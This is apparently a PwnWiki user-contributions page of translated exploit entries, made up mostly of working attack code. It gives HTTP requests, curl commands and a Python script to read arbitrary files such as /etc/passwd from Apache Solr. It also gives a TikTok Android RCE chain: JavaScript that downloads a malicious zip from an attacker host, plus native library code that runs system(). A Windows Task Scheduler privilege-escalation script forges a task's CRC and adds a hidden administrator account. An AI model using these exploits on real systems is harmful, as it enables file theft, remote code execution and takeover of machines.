PwnWiki - User contributions [Chinese]

Apache Solr任意文件讀取漏洞/en

2021-04-29T03:39:23Z

LovelyWei: Created page with "==File Reading=="

<languages />

==Vulnerability Impact==
<pre>
Apache Solr <= 8.8.1
</pre>

==Exploit==

First, go to the admin page and get the information about core

<pre>
http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json
</pre>

Send the following packet
<pre>
POST /solr/ckan/config HTTP/1.1
Host: xxx.xxx.xxx:8983
Content-Length: 99
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://118.31.46.134:8983
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://118.31.46.134:8983/solr/ckan/config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true},"olrkzv64tv":"="}
</pre>

==File Reading==
<pre>
POST /solr/ckan/debug/dump?param=ContentStreams HTTP/1.1
Host: xxx.xxx.xxx.xxx:8983
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Origin: http://118.31.46.134:8983
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://118.31.46.134:8983/solr/ckan/config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

stream.url=file:///etc/passwd
</pre>

curl request as
<pre>
curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx:8983/solr/{corename}/config -H 'Content-type:application/json'
curl "http://xxx.xxx.xxx.xxx:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd"
</pre>

==POC==
<pre>
import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m')
print('+ \033[36m使用格式: python3 CVE-2019-0193.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')
print('+ \033[36mFile >>> 文件名称或目录 \033[0m')
print('+------------------------------------------')

def POC_1(target_url):
core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
response = requests.request("GET", url=core_url, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
print("\033[32m[o] 成功获得core_name,Url为：" + target_url + "/solr/" + core_name + "/config\033[0m")
return core_name
except:
print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
sys.exit(0)

def POC_2(target_url, core_name):
vuln_url = target_url + "/solr/" + core_name + "/config"
headers = {
"Content-type":"application/json"
}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
if "This" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
sys.exit(0)

except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)

def POC_3(target_url, core_name, File_name):
vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'stream.url=file://{}'.format(File_name)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
if "No such file or directory" in response.text:
print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
else:
print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))

except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
core_name = POC_1(target_url)
POC_2(target_url, core_name)
while True:
File_name = str(input("\033[35mFile >>> \033[0m"))
POC_3(target_url, core_name, File_name)
</pre>

Translations:Apache Solr任意文件讀取漏洞/6/en

2021-04-29T03:38:47Z

LovelyWei:

curl request as

Translations:Apache Solr任意文件讀取漏洞/6/en

2021-04-29T03:38:32Z

LovelyWei: Created page with "curl request is"

curl request is

Translations:Apache Solr任意文件讀取漏洞/5/en

2021-04-29T03:38:18Z

LovelyWei: Created page with "==File Reading=="

==File Reading==

Translations:Apache Solr任意文件讀取漏洞/4/en

2021-04-29T03:37:36Z

LovelyWei: Created page with "Send the following packet"

Send the following packet

Translations:Apache Solr任意文件讀取漏洞/3/en

2021-04-29T03:37:15Z

LovelyWei: Created page with "First, go to the admin page and get the information about core"

First, go to the admin page and get the information about core

Translations:Apache Solr任意文件讀取漏洞/2/en

2021-04-29T03:36:10Z

LovelyWei: Created page with "==Exploit=="

==Exploit==

Translations:Apache Solr任意文件讀取漏洞/1/en

2021-04-29T03:35:11Z

LovelyWei: Created page with "==Vulnerability Impact=="

==Vulnerability Impact==

Translations:Apache Solr任意文件讀取漏洞/Page display title/en

2021-04-29T03:35:06Z

LovelyWei: Created page with "Apache Solr Arbitrary File Read Vulnerability"

Apache Solr Arbitrary File Read Vulnerability

安卓版TikTok RCE漏洞/en

2021-04-29T03:33:33Z

LovelyWei: Created page with "Malicious library code:"

<languages />
Created a zip file with a path that traverses the file name and overwrites the
<pre>
/data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
</pre>

<pre>
dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

--
Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files
</pre>

Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.

==POC==
<pre>
document.title = "Loading..";
document.write("<h1>Loading..</h1>");
if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.
window.name = "finished";
window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "preloadMiniApp",
"__msg_type": "callback",
"params": {
"mini_app_url": "https://microapp/"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://d.c/"
})); // initialize Mini App
window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
setTimeout(function() {
window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // load the malicious library after overwrtting it.
}, 5000);
}
</pre>

Malicious library code:
<pre>
#include <jni.h>
#include <string>
#include <stdlib.h>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system("id > /data/data/com.zhiliaoapp.musically/PoC");
return JNI_VERSION_1_6;
}
</pre>

Translations:安卓版TikTok RCE漏洞/3/en

2021-04-29T03:33:25Z

LovelyWei: Created page with "Malicious library code:"

Malicious library code:

Translations:安卓版TikTok RCE漏洞/2/en

2021-04-29T03:32:46Z

LovelyWei: Created page with "Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application."

Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.

Translations:安卓版TikTok RCE漏洞/1/en

2021-04-29T03:31:49Z

LovelyWei: Created page with "Created a zip file with a path that traverses the file name and overwrites the"

Created a zip file with a path that traverses the file name and overwrites the

Windows7/win2008特權提升0day/en

2021-04-29T03:31:44Z

LovelyWei: Created page with "Save the exploit as <code>taskxpl.wsf</code>"

<languages />

==EXP==
Save the exploit as <code>taskxpl.wsf</code>

<pre>
<job id="tasksch-wD-0day">
<script language="Javascript">

crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
0x2D02EF8D
);

var hD='0123456789ABCDEF';

function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = hD.charAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
var r="";
var e=str.length;
var c=0;
var h;
while(c<e){
h=str.charCodeAt(c++).toString(16);
while(h.length<3) h="0"+h;
r+=h;
}
return r;
}
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){

r=r+String.fromCharCode("0x"+str.substring(s,s+2));

s=s+2;
e=e-2;
}

return r;

}

function calc_crc(anyForm) {

anyTextString=decodeFromHex(anyForm);

Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);

}

function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
anyTextString=decodeFromHex(leadString);

Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
//document.write(alert(StringLength));
for (var i=0; i<StringLength; i++) {
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
//
// Second, we calculate the CRC-32 without the final string
//
crc=parseInt(crc32,16);
crc ^= 0xFFFFFFFF;
anyTextString=decodeFromHex(endString);
StringLength=anyTextString.length;
for (var i=0; i<StringLength; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
}
//
// Now let's find the 4-byte string
//
for (var i=0; i<4; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex;
}
crc ^= Crc_value;
//
// Finally, display the results
//
var TextString=dec2hex(crc);
var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
return Teststring
}
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){

r=r+String.fromCharCode("0x"+str.substring(s,s+2));

s=s+2;
e=e-2;
}

return r;

}
</script>

<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True

Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")

Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
Set bin = CreateObject("ADODB.Stream")
bin.Type = adTypeBinary
bin.Open
bin.LoadFromFile strFileName
ReadByteArray = bin.Read
'output.writeline ReadByteArray
End Function

Function OctetToHexStr (arrbytOctet)
Dim k
OctetToHexStr = ""
For k = 3 To Lenb (arrbytOctet)
OctetToHexStr = OctetToHexStr _
& Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
Next
End Function
strFileName="C:\windows\system32\tasks\wDw00t"

hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 original: "+crc32

Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")

Do Until objExecObject.StdOut.AtEndOfStream
strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close

xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)

hexXML = OctetToHexStr (ReadByteArray(strFileName))

leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes

finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge

strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")

Set ts = fso.createtextfile (strFileName)

For n = 1 To (Len (strHexString) - 1) step 2
ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close

Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True

</script>
</job>
</pre>

Translations:安卓版TikTok RCE漏洞/Page display title/en

2021-04-29T03:30:28Z

LovelyWei: Created page with "TikTok for Android Remote Code Execution Vulnerability"

TikTok for Android Remote Code Execution Vulnerability

Translations:Windows7/win2008特權提升0day/1/en

2021-04-29T03:27:02Z

LovelyWei: Created page with "Save the exploit as <code>taskxpl.wsf</code>"

Save the exploit as <code>taskxpl.wsf</code>

Translations:Windows7/win2008特權提升0day/Page display title/en

2021-04-29T03:26:12Z

LovelyWei: Created page with "Windows 7/Win2008 elevation of privilege zero-day vulnerability"

Windows 7/Win2008 elevation of privilege zero-day vulnerability

CVE-2021-3449 OpenSSL拒絕服務漏洞/en

2021-04-29T03:02:48Z

LovelyWei: Created page with "openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server."

<languages />

==Vulnerability Impact==
<pre>
< 1.1.1-k
</pre>

==Vulnerability information==
openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.

==POC==
<pre>
https://github.com/terorie/cve-2021-3449
</pre>

Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/Page display title/en

2021-04-29T03:02:20Z

LovelyWei: Created page with "CVE-2021-3449 OpenSSL Denial of Service Vulnerability"

CVE-2021-3449 OpenSSL Denial of Service Vulnerability

Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/1/en

2021-04-29T03:02:16Z

LovelyWei: Created page with "==Vulnerability Impact=="

==Vulnerability Impact==

Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/2/en

2021-04-29T03:02:13Z

LovelyWei: Created page with "==Vulnerability information=="

==Vulnerability information==

Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/3/en

2021-04-29T03:02:08Z

openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.